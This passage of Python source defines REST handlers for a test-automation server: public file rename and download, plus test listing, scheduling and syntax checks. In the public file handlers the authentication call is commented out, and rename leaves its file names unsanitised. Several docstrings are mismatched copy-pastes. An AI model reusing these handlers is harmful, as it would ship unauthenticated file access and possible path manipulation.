raise HTTP_500("Unable to remove file")
if success == Context.instance().CODE_FAILED:
raise HTTP_403("Remove file denied")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("File does not exists")
return {"cmd": self.request.path,
"message": "file sucessfully removed"}
class PublicRename(HandlerCORS):
"""
/rest/public/file/rename
"""
def post(self):
"""
tags:
- public
summary: Import file to the public storage. Provide the file in base64 format
description: ''
operationId: publicFileRename
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ file-path, file-content ]
properties:
file-path:
type: string
file-content:
type: string
string: in base64 format
responses:
'200':
description: File sucessfully imported
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"message": "file sucessfully imported",
"cmd": "/public/file/import"
}
'401':
description: Access denied
'400':
description: Bad request
'403':
description: File already exists
'500':
description: Server error
"""
# user_profile = _get_user(request=self.request)
try:
fileName = self.request.data.get("source")["file-path"]
if fileName is None:
raise EmptyValue("Please specify a source filename")
filePath = self.request.data.get("source")["file-name"]
if filePath is None:
raise EmptyValue("Please specify a source file path")
fileExt = self.request.data.get("source")["file-extension"]
if fileExt is None:
raise EmptyValue("Please specify a source file extension")
newFileName = self.request.data.get("destination")["file-name"]
if newFileName is None:
raise EmptyValue("Please specify a destination file name")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
success = RepoTests.instance().renameFile(
mainPath=filePath,
oldFilename=fileName,
newFilename=newFileName,
extFilename=fileExt,
supportSnapshot=False
)
if success == Context.instance().CODE_ERROR:
raise HTTP_500("Unable to rename file")
if success == Context.instance().CODE_ALREADY_EXISTS:
raise HTTP_403("Rename file denied")
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_404("File does not exists")
return {"cmd": self.request.path,
"message": "file sucessfully renamed"}
class PublicDownload(HandlerCORS):
"""
/rest/public/file/download
"""
def post(self):
"""
tags:
- public
summary: Import file to the public storage. Provide the file in base64 format
description: ''
operationId: publicFileDownload
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ file-path, file-content ]
properties:
file-path:
type: string
file-content:
type: string
string: in base64 format
responses:
'200':
description: File sucessfully imported
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"message": "file sucessfully imported",
"cmd": "/public/file/import"
}
'401':
description: Access denied
'400':
description: Bad request
'403':
description: File already exists
'500':
description: Server error
"""
# user_profile = _get_user(request=self.request)
try:
filePath = self.request.data.get("file-path")
if filePath is None:
raise EmptyValue("Please specify a project name and file path")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# avoid directory traversal
filePath = os.path.normpath("/" + filePath)
success, _, _, _, content, _, _ = RepoTests.instance().getFile(
pathFile=filePath, binaryMode=True, addLock=False)
if success == Context.instance().CODE_NOT_FOUND:
raise HTTP_500("Unable to download file")
return {"cmd": self.request.path, "file-content": content}
"""
Tests handlers
"""
class TestsDictListing(HandlerCORS):
"""
/rest/tests/listing/dict
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Get the listing of all tests in dict mode.
description: ''
operationId: testsDictListing
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id ]
properties:
project-id:
type: integer
responses:
'200':
schema :
properties:
cmd:
type: string
listing:
type: array
items:
type: string
project-id:
type: string
examples:
application/json: |
{
"cmd": "/tests/listing/dict",
"listing": {},
"project-id": 1
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
listing = RepoTests.instance().getDictListing(projectId=projectId)
return {"cmd": self.request.path,
"listing": listing, "project-id": projectId}
class TestsBasicListing(HandlerCORS):
"""
/rest/tests/listing/basic
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Get the listing of all tests in basic mode.
description: ''
operationId: testsBasicListing
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id ]
properties:
project-id:
type: integer
responses:
'200':
schema :
properties:
cmd:
type: string
listing:
type: array
items:
type: string
project-id:
type: string
examples:
application/json: |
{
"cmd": "/tests/listing/basic",
"listing": ["/Snippets/UI/03_OpenBrowser.tux", "/Snippets/UI/05_MaximizeBrowser.tux"],
"project-id": 1
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
listing = RepoTests.instance().getBasicListing(projectId=projectId)
return {"cmd": self.request.path,
"listing": listing, "project-id": projectId}
class TestsScheduleGroup(HandlerCORS):
"""
/rest/tests/schedule/group
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Schedule a group of tests
description: ''
operationId: testsScheduleGroup
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ tests, postpone-at, parallel-mode, postpone-mode]
properties:
tests:
type: array
items:
type: string
postpone-at:
type: array
description: '[ Y,M,D,H,M,S ]'
items:
type: integer
parallel-mode:
type: boolean
postpone-mode:
type: boolean
responses:
'200':
schema :
properties:
cmd:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/schedule/group",
"message": "success"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
postponeAt = self.request.data.get("postpone-at")
if postponeAt is None:
raise EmptyValue("Please specify a postpone at")
postponeMode = self.request.data.get("postpone-mode")
if postponeMode is None:
raise EmptyValue("Please specify a postpone mode")
tests = self.request.data.get("tests")
if tests is None:
raise EmptyValue("Please specify tests")
parallel = self.request.data.get("parallel-mode")
if parallel is None:
raise EmptyValue("Please specify parallel-mode")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
if len(postponeAt) != 6:
raise HTTP_400(
"Bad schedule-at provided in request, array of size 6 expected")
testsRun = []
for t in tests:
try:
prjName, absPath = t.split(':', 1)
except Exception as e:
raise HTTP_500("Unable to extract project name: %s" % str(e))
prjID = ProjectsManager.instance().getProjectID(name=prjName)
testPath, testExtension = absPath.rsplit('.', 1)
if len(testPath.rsplit('/', 1)) > 1:
testName = testPath.rsplit('/', 1)[1]
else:
testName = testPath.rsplit('/', 1)[0]
if testExtension == 'tsx':
doc = TestSuite.DataModel()
res = doc.load(absPath="%s/%s/%s.%s" % (RepoTests.instance().testsPath, prjID,
testPath, testExtension))
if not res:
raise HTTP_500('Unable to read test suite: %s' % testPath)
testData = {'test-definition': doc.testdef,
'test-execution': doc.testexec,
'test-properties': doc.properties['properties'],
'test-extension': testExtension}
testsRun.append({'prj-id': prjID,
'test-extension': testExtension,
'test-name': testName,
'test-path': testPath, 'test-data': testData})
elif testExtension == 'tux':
doc = TestUnit.DataModel()
res = doc.load(absPath="%s/%s/%s.%s" % (RepoTests.instance().testsPath,
prjID, testPath, testExtension))
if not res:
raise HTTP_500('Unable to read test unit: %s' % testPath)
testData = {'test-definition': doc.testdef,
'test-execution': '',
'test-properties': doc.properties['properties'],
'test-extension': testExtension}
testsRun.append({'prj-id': prjID, 'test-extension': testExtension,
'test-name': testName,
'test-path': testPath, 'test-data': testData})
elif testExtension == 'tpx':
doc = TestPlan.DataModel()
res = doc.load(absPath="%s/%s/%s.%s" % (RepoTests.instance().testsPath,
prjID, testPath, testExtension))
if not res:
raise HTTP_500('Unable to read test plan: %s' % testPath)
tests = doc.getSorted()
success, error_msg = RepoTests.instance().addtf2tp(data_=tests)
if success != Context.instance().CODE_OK:
raise HTTP_500(
'Unable to prepare test plan: %s' %
error_msg)
testData = {'test-execution': doc.getSorted(),
'test-properties': doc.properties['properties'],
'test-extension': testExtension}
testsRun.append({'prj-id': prjID, 'test-extension': testExtension,
'test-name': testName,
'test-path': testPath, 'test-data': testData})
elif testExtension == 'tgx':
doc = TestPlan.DataModel()
res = doc.load(absPath="%s/%s/%s.%s" % (RepoTests.instance().testsPath,
prjID, testPath, testExtension))
if not res:
raise HTTP_500('Unable to read test global: %s' % testPath)
alltests = doc.getSorted()
success, error_msg, alltests = RepoTests.instance().addtf2tg(data_=alltests)
if success != Context.instance().CODE_OK:
raise HTTP_500(
'Unable to prepare test global: %s' %
error_msg)
testData = {'test-execution': alltests,
'test-properties': doc.properties['properties'],
'test-extension': testExtension}
testsRun.append({'prj-id': prjID, 'test-extension': testExtension,
'test-name': testName,
'test-path': testPath, 'test-data': testData})
else:
raise HTTP_500(
'test extension not supported: %s' %
testExtension)
if len(testsRun):
success = TaskManager.instance().addTasks(userName=user_profile['login'],
tests=testsRun,
runAt=postponeAt,
queueAt=postponeMode,
simultaneous=parallel)
if not success:
raise HTTP_500('Unable to run the group of tests')
else:
raise HTTP_500('No tests provided')
return {"cmd": self.request.path, "message": "success"}
class TestsSchedule(HandlerCORS):
"""
/rest/tests/schedule
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Schedule a test unit/suite
description: ''
operationId: testsSchedule
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, test-extension, test-path, test-name]
properties:
project-id:
type: integer
test-definition:
type: string
test-execution:
type: string
test-properties:
type: object
test-extension:
type: string
test-path:
type: string
test-name:
type: string
schedule-id:
type: integer
description: '0 => now, 1 => at, 2 => in'
schedule-at:
type: array
description: '[ Y,M,D,H,M,S ]'
items:
type: integer
schedule-repeat:
type: integer
probes-enabled:
type: boolean
debug-enabled:
type: boolean
notifications-enabled:
type: boolean
logs-enabled:
type: boolean
from-time:
type: array
description: '[ Y,M,D,H,M,S ]'
items:
type: integer
to-time:
type: array
description: '[ Y,M,D,H,M,S ]'
items:
type: integer
tab-id:
type: integer
step-mode:
type: boolean
breakpoint-mode:
type: boolean
background-mode:
type: boolean
test-inputs:
type: array
description: Test inputs parameters can be used to overwrite the original test parameters
items:
type: object
required: [ name, value, type ]
properties:
name:
type: string
type:
type: string
value:
type: string
responses:
'200':
description: tests listing
schema :
properties:
cmd:
type: string
test-id:
type: string
task-id:
type: string
tab-id:
type: string
test-name:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/schedule",
"message": ""
"test-id": "",
"task-id": "",
"tab-id": ""
"test-name": ""
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
testDefinition = self.request.data.get("test-definition")
if testDefinition is None:
testDefinition = ""
testExecution = self.request.data.get("test-execution")
if testExecution is None:
testExecution = ""
testProperties = self.request.data.get("test-properties")
if testProperties is None:
testProperties = {}
testExtension = self.request.data.get("test-extension")
if testExtension is None:
raise EmptyValue("Please specify a test extension")
testPath = self.request.data.get("test-path")
if testPath is None:
raise EmptyValue("Please specify a test path")
testName = self.request.data.get("test-name")
if testName is None:
raise EmptyValue("Please specify a test name")
scheduleId = self.request.data.get("schedule-id")
if scheduleId is None:
scheduleId = 0
_scheduleAt = self.request.data.get("schedule-at")
_scheduleRepeat = self.request.data.get("schedule-repeat", 0)
_tabId = self.request.data.get("tab-id")
_backgroundMode = self.request.data.get("background-mode")
_stepMode = self.request.data.get("step-mode")
_breakpointMode = self.request.data.get("breakpoint-mode")
_probesEnabled = self.request.data.get("probes-enabled")
_notificationsEnabled = self.request.data.get(
"notifications-enabled")
_logsEnabled = self.request.data.get("logs-enabled")
_debugEnabled = self.request.data.get("debug-enabled")
_fromTime = self.request.data.get("from-time")
_toTime = self.request.data.get("to-time")
_testInputs = self.request.data.get("test-inputs")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# checking input
if not isinstance(projectId, int):
raise HTTP_400("Bad project id provided in request, int expected")
if not isinstance(scheduleId, int):
raise HTTP_400("Bad schedule id provided in request, int expected")
if _testInputs is not None:
if not isinstance(_testInputs, list):
raise HTTP_400(
"Bad test inputs provided in request, list expected")
for inp in _testInputs:
if not isinstance(inp, dict):
raise HTTP_400(
"Bad test inputs provided in request, list of dict expected")
if not ("name" in inp and "type" in inp and "value" in inp):
raise HTTP_400(
"Bad test format inputs provided in request")
# find if the user is connected on the channel too
channelId = False
channel = Context.instance().getUser(user_profile["login"])
if channel is not None:
channelId = list(channel['address'])
# run a test not save; change the project id to the default
if projectId == 0:
projectId = ProjectsManager.instance().getDefaultProjectForUser(
user=user_profile['login'])
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# no test content provided
if not len(testDefinition) and not len(
testExecution) and not len(testProperties):
if testExtension == 'tsx':
doc = TestSuite.DataModel()
res = doc.load(absPath="%s/%s/%s/%s.%s" % (RepoTests.instance().testsPath,
projectId,
testPath,
testName,
testExtension))
if not res:
raise HTTP_500('Unable to read test suite: %s' % testPath)
testData = {'test-definition': doc.testdef,
'test-execution': doc.testexec,
'test-properties': doc.properties['properties'],
'test-extension': testExtension
}
elif testExtension == 'tux':
doc = TestUnit.DataModel()
res = doc.load(absPath="%s/%s/%s/%s.%s" % (RepoTests.instance().testsPath,
projectId,
testPath,
testName,
testExtension))
if not res:
raise HTTP_500('Unable to read test unit: %s' % testPath)
testData = {'test-definition': doc.testdef,
'test-properties': doc.properties['properties'],
'test-extension': testExtension}
else:
raise HTTP_403(
'Test extension not supported: %s' %
testExtension)
else:
if testExtension == 'tsx':
testData = {'test-definition': testDefinition,
'test-execution': testExecution,
'test-properties': testProperties,
'test-extension': testExtension}
elif testExtension == 'tux':
testData = {'test-definition': testDefinition,
'test-execution': '',
'test-properties': testProperties,
'test-extension': testExtension}
else:
raise HTTP_403(
'Test extension not supported - no content: %s' %
testExtension)
tabId = 0
backgroundMode = True
stepMode = False
breakpointMode = False
notificationsEnabled = False
logsEnabled = True
debugEnabled = False
probesEnabled = False
fromTime = (0, 0, 0, 0, 0, 0)
toTime = (0, 0, 0, 0, 0, 0)
message = "success"
scheduleAt = (0, 0, 0, 0, 0, 0)
if _tabId is not None:
tabId = _tabId
if _backgroundMode is not None:
backgroundMode = _backgroundMode
if _stepMode is not None:
stepMode = _stepMode
if _breakpointMode is not None:
breakpointMode = _breakpointMode
if _notificationsEnabled is not None:
notificationsEnabled = _notificationsEnabled
if _logsEnabled is not None:
logsEnabled = _logsEnabled
if _debugEnabled is not None:
debugEnabled = _debugEnabled
if _probesEnabled is not None:
probesEnabled = _probesEnabled
if _fromTime is not None:
fromTime = _fromTime
if _toTime is not None:
toTime = _toTime
if _scheduleAt is not None:
scheduleAt = _scheduleAt
# personalize test description ?
if _testInputs is not None:
for newInp in _testInputs:
if "scope" not in newInp:
newInp["scope"] = "local"
for origInp in testData["test-properties"]['inputs-parameters']['parameter']:
if "scope" not in origInp:
origInp["scope"] = "local"
# if the param exist on the original test than overwrite
# them
if newInp["name"] == origInp["name"]:
origInp["value"] = newInp["value"]
origInp["type"] = newInp["type"]
origInp["scope"] = newInp["scope"]
if not testPath.endswith(testName):
if len(testPath):
_testPath = "%s/%s" % (testPath, testName)
else:
_testPath = testName
_testPath = os.path.normpath(_testPath)
else:
_testPath = testPath
task = TaskManager.instance().registerTask(
testData=testData,
testName=testName,
testPath=_testPath,
testUserId=user_profile['id'],
testUser=user_profile['login'],
testId=tabId,
testBackground=backgroundMode,
runAt=scheduleAt,
runType=scheduleId,
runNb=_scheduleRepeat,
withoutProbes=probesEnabled,
debugActivated=debugEnabled,
withoutNotif=notificationsEnabled,
noKeepTr=not logsEnabled,
testProjectId=projectId,
runFrom=fromTime,
runTo=toTime,
stepByStep=stepMode,
breakpoint=breakpointMode,
channelId=channelId
)
if task.lastError is not None:
raise HTTP_500('ERROR: %s' % task.lastError)
if task.isRecursive():
message = "recursive"
if task.isRecursive() and backgroundMode:
message = "recursive-background"
if task.isPostponed():
message = "postponed"
if task.isPostponed() and backgroundMode:
message = "postponed-background"
if task.isSuccessive():
message = "successive"
if task.isSuccessive() and backgroundMode:
message = "successive-background"
if not task.isSuccessive() and not task.isPostponed(
) and not task.isRecursive() and backgroundMode:
message = "background"
return {"cmd": self.request.path,
"message": message,
"task-id": task.getId(),
"test-id": task.getTestID(),
"tab-id": tabId,
"test-name": testName
}
class TestsScheduleTpg(HandlerCORS):
"""
/rest/tests/schedule/tpg
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Schedule a testplan or test global
description: ''
operationId: testsScheduleTpg
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id, test-extension, test-path, test-name]
properties:
project-id:
type: integer
test-execution:
type: string
test-properties:
type: object
test-extension:
type: string
test-path:
type: string
test-name:
type: string
schedule-id:
type: integer
description: '0 => now, 1 => at, 2 => in'
schedule-at:
type: array
description: '[ Y,M,D,H,M,S ]'
items:
type: integer
schedule-repeat:
type: integer
probes-enabled:
type: boolean
debug-enabled:
type: boolean
notifications-enabled:
type: boolean
logs-enabled:
type: boolean
from-time:
type: array
description: '[ Y,M,D,H,M,S ]'
items:
type: integer
to-time:
type: array
description: '[ Y,M,D,H,M,S ]'
items:
type: integer
tab-id:
type: integer
step-mode:
type: boolean
breakpoint-mode:
type: boolean
background-mode:
type: boolean
test-inputs:
type: array
description: Test inputs parameters can be used to overwrite the original test parameters
items:
type: object
required: [ name, value, type ]
properties:
name:
type: string
type:
type: string
value:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
test-id:
type: string
task-id:
type: string
tab-id:
type: string
test-name:
type: string
message:
type: string
examples:
application/json: |
{
"cmd": "/tests/schedule/tpg"
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
testExecution = self.request.data.get("test-execution")
if testExecution is None:
testExecution = ""
testProperties = self.request.data.get("test-properties")
if testProperties is None:
testProperties = {}
testExtension = self.request.data.get("test-extension")
if testExtension is None:
raise EmptyValue("Please specify a test extension")
testPath = self.request.data.get("test-path")
if testPath is None:
raise EmptyValue("Please specify a test path")
testName = self.request.data.get("test-name")
if testName is None:
raise EmptyValue("Please specify a test name")
scheduleId = self.request.data.get("schedule-id")
if scheduleId is None:
scheduleId = 0
_scheduleAt = self.request.data.get("schedule-at")
_scheduleRepeat = self.request.data.get("schedule-repeat", 0)
_tabId = self.request.data.get("tab-id")
_backgroundMode = self.request.data.get("background-mode")
_stepMode = self.request.data.get("step-mode")
_breakpointMode = self.request.data.get("breakpoint-mode")
_probesEnabled = self.request.data.get("probes-enabled")
_notificationsEnabled = self.request.data.get(
"notifications-enabled")
_logsEnabled = self.request.data.get("logs-enabled")
_debugEnabled = self.request.data.get("debug-enabled")
_fromTime = self.request.data.get("from-time")
_toTime = self.request.data.get("to-time")
_testInputs = self.request.data.get("test-inputs")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
# checking input
if not isinstance(projectId, int):
raise HTTP_400("Bad project id provided in request, int expected")
if not isinstance(scheduleId, int):
raise HTTP_400("Bad schedule id provided in request, int expected")
if _testInputs is not None:
if not isinstance(_testInputs, list):
raise HTTP_400(
"Bad test inputs provided in request, list expected")
for inp in _testInputs:
if not isinstance(inp, dict):
raise HTTP_400(
"Bad test inputs provided in request, list of dict expected")
if not ("name" in inp and "type" in inp and "value" in inp):
raise HTTP_400(
"Bad test format inputs provided in request")
# find if the user is connected on the channel too
channelId = False
channel = Context.instance().getUser(user_profile["login"])
if channel is not None:
channelId = list(channel['address'])
# run a test not save; change the project id to the default
if projectId == 0:
projectId = ProjectsManager.instance().getDefaultProjectForUser(
user=user_profile['login'])
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
# no test content provided
if not len(testExecution) and not len(testProperties):
if testExtension == 'tpx':
doc = TestPlan.DataModel()
res = doc.load(absPath="%s/%s/%s/%s.%s" % (RepoTests.instance().testsPath,
projectId,
testPath,
testName,
testExtension))
if not res:
raise HTTP_500('Unable to read test plan: %s' % testPath)
tests = doc.getSorted()
success, error_msg = RepoTests.instance().addtf2tp(data_=tests)
if success != Context.instance().CODE_OK:
raise HTTP_500(
'Unable to prepare test plan: %s' %
error_msg)
testData = {'test-execution': tests,
'test-properties': doc.properties['properties'],
'test-extension': testExtension}
elif testExtension == 'tgx':
doc = TestPlan.DataModel()
res = doc.load(absPath="%s/%s/%s/%s.%s" % (RepoTests.instance().testsPath,
projectId,
testPath,
testName,
testExtension))
if not res:
raise HTTP_500('Unable to read test global: %s' % testPath)
alltests = doc.getSorted()
success, error_msg, alltests = RepoTests.instance().addtf2tg(data_=alltests)
if success != Context.instance().CODE_OK:
raise HTTP_500(
'Unable to prepare test global: %s' %
error_msg)
testData = {'test-execution': alltests,
'test-properties': doc.properties['properties'],
'test-extension': testExtension}
else:
raise HTTP_403(
'Test extension not supported: %s' %
testExtension)
else:
if testExtension == 'tpx':
success, error_msg = RepoTests.instance().addtf2tp(data_=testExecution)
if success != Context.instance().CODE_OK:
raise HTTP_500(
'Unable to prepare test plan: %s' %
error_msg)
testData = {'test-definition': '',
'test-execution': testExecution,
'test-properties': testProperties,
'test-extension': testExtension}
elif testExtension == 'tgx':
success, error_msg, testExecution = RepoTests.instance().addtf2tg(data_=testExecution)
if success != Context.instance().CODE_OK:
raise HTTP_500(
'Unable to prepare test global: %s' %
error_msg)
testData = {'test-definition': '',
'test-execution': testExecution,
'test-properties': testProperties,
'test-extension': testExtension}
else:
raise HTTP_403(
'Test extension not supported - no content: %s' %
testExtension)
tabId = 0
backgroundMode = True
stepMode = False
breakpointMode = False
notificationsEnabled = False
logsEnabled = True
debugEnabled = False
probesEnabled = False
fromTime = (0, 0, 0, 0, 0, 0)
toTime = (0, 0, 0, 0, 0, 0)
scheduleAt = (0, 0, 0, 0, 0, 0)
message = "success"
if _tabId is not None:
tabId = _tabId
if _backgroundMode is not None:
backgroundMode = _backgroundMode
if _stepMode is not None:
stepMode = _stepMode
if _breakpointMode is not None:
breakpointMode = _breakpointMode
if _notificationsEnabled is not None:
notificationsEnabled = _notificationsEnabled
if _logsEnabled is not None:
logsEnabled = _logsEnabled
if _debugEnabled is not None:
debugEnabled = _debugEnabled
if _probesEnabled is not None:
probesEnabled = _probesEnabled
if _fromTime is not None:
fromTime = _fromTime
if _toTime is not None:
toTime = _toTime
if _scheduleAt is not None:
scheduleAt = _scheduleAt
# personalize test description ?
if _testInputs is not None:
for newInp in _testInputs:
for origInp in testData["test-properties"]['inputs-parameters']['parameter']:
# if the param exist on the original test than overwrite
# them
if newInp["name"] == origInp["name"]:
origInp["value"] = newInp["value"]
origInp["type"] = newInp["type"]
if "scope" in newInp: # condition for backward compatibility
origInp["scope"] = newInp["scope"]
else:
origInp["scope"] = "local"
if not testPath.endswith(testName):
if len(testPath):
_testPath = "%s/%s" % (testPath, testName)
else:
_testPath = testName
_testPath = os.path.normpath(_testPath)
else:
_testPath = testPath
task = TaskManager.instance().registerTask(
testData=testData,
testName=testName,
testPath=_testPath,
testUserId=user_profile['id'],
testUser=user_profile['login'],
testId=tabId,
testBackground=backgroundMode,
runAt=scheduleAt,
runType=scheduleId,
runNb=_scheduleRepeat,
withoutProbes=probesEnabled,
debugActivated=debugEnabled,
withoutNotif=notificationsEnabled,
noKeepTr=not logsEnabled,
testProjectId=projectId,
runFrom=fromTime,
runTo=toTime,
stepByStep=stepMode,
breakpoint=breakpointMode,
channelId=channelId
)
if task.lastError is not None:
raise HTTP_500('Unable to run the test: %s' % task.lastError)
if task.isRecursive():
message = "recursive"
if task.isRecursive() and backgroundMode:
message = "recursive-background"
if task.isPostponed():
message = "postponed"
if task.isPostponed() and backgroundMode:
message = "postponed-background"
if task.isSuccessive():
message = "successive"
if task.isSuccessive() and backgroundMode:
message = "successive-background"
if not task.isSuccessive() and not task.isPostponed(
) and not task.isRecursive() and backgroundMode:
message = "background"
return {"cmd": self.request.path,
"message": message,
"task-id": task.getId(),
"test-id": task.getTestID(),
"tab-id": tabId,
"test-name": testName
}
class TestsListing(HandlerCORS):
"""
/rest/tests/listing
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: Get the listing of all tests.
description: ''
operationId: testsListing
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ project-id ]
properties:
project-id:
type: integer
for-saveas:
type: boolean
for-runs:
type: boolean
responses:
'200':
schema :
properties:
cmd:
type: string
listing:
type: array
items:
type: string
project-id:
type: integer
examples:
application/json: |
{
"cmd": "/tests/listing",
"listing": [],
"project-id": 1
}
'400':
description: Bad request provided
'403':
description: Access denied to this project
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
projectId = self.request.data.get("project-id")
if projectId is None:
raise EmptyValue("Please specify a project id")
_forsaveas = self.request.data.get("for-saveas", False)
_forruns = self.request.data.get("for-runs", False)
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
_check_project_permissions(
user_login=user_profile['login'],
project_id=projectId)
_, _, listing, _ = RepoTests.instance().getTree(project=projectId)
return {"cmd": self.request.path, "listing": listing, "project-id": projectId,
"for-saveas": _forsaveas, "for-runs": _forruns}
class TestsCheckSyntax(HandlerCORS):
"""
/rest/tests/check/syntax
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: check the syntax of a test (unit, abstract and suite)
description: ''
operationId: testsCheckSyntax
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-definition, test-execution, test-properties, test-name, test-path, test-extension ]
properties:
test-definition:
type: string
test-execution:
type: string
test-properties:
type: string
test-name:
type: string
test-path:
type: string
test-extension:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
status:
type: boolean
error-msg:
type: string
examples:
application/json: |
{
"cmd": "/tests/check/syntax/string",
"status": True,
"error-msg": "...."
}
'400':
description: Bad request provided
'500':
description: Server error
"""
user_profile = _get_user(request=self.request)
try:
testDefinition = self.request.data.get("test-definition")
if testDefinition is None:
raise EmptyValue("Please specify a test definition")
testExecution = self.request.data.get("test-execution")
if testExecution is None:
raise EmptyValue("Please specify a test execution")
testProperties = self.request.data.get("test-properties")
if testProperties is None:
raise EmptyValue("Please specify a test properties")
testName = self.request.data.get("test-name")
if testName is None:
raise EmptyValue("Please specify a test name")
testPath = self.request.data.get("test-path")
if testPath is None:
raise EmptyValue("Please specify a test path")
testExtension = self.request.data.get("test-extension")
if testExtension is None:
raise EmptyValue("Please specify a test extension")
except EmptyValue as e:
raise HTTP_400("%s" % e)
except Exception as e:
raise HTTP_400("Bad request provided (%s ?)" % e)
if testExtension not in ["tax", "tux", "tsx"]:
raise HTTP_400("Bad test extension provided (%s)" % testExtension)
task = TaskManager.getObjectTask(
testData=self.request.data, testName=testName,
testPath=testPath, testUser=user_profile["login"],
testId=0, testBackground=False,
# statsmgr=StatsManager.instance(),
context=Context
)
status, error_msg = task.parseTest()
del task
return {"cmd": self.request.path, "status": status, "error": error_msg}
class TestsCheckSyntaxTpg(HandlerCORS):
"""
/rest/tests/check/syntax/tpg
"""
@_to_yaml
def post(self):
"""
tags:
- tests
summary: check the syntax of a test (plan and global)
description: ''
operationId: testsCheckSyntaxTpg
consumes:
- application/json
produces:
- application/json
parameters:
- name: Cookie
in: header
description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
required: true
type: string
- name: body
in: body
required: true
schema:
required: [ test-execution, test-properties, test-name, test-path, test-extension ]
properties:
test-execution:
type: array
items:
type: string
test-properties:
type: string
test-name:
type: string
test-path:
type: string
test-extension:
type: string
responses:
'200':
schema :
properties:
cmd:
type: string
status:
type: boolean
error-msg:
type: string
examples:
application/json: |
{
"cmd": "/tests/check/syntax/tpg",
"status": True,
"error-msg": "...."
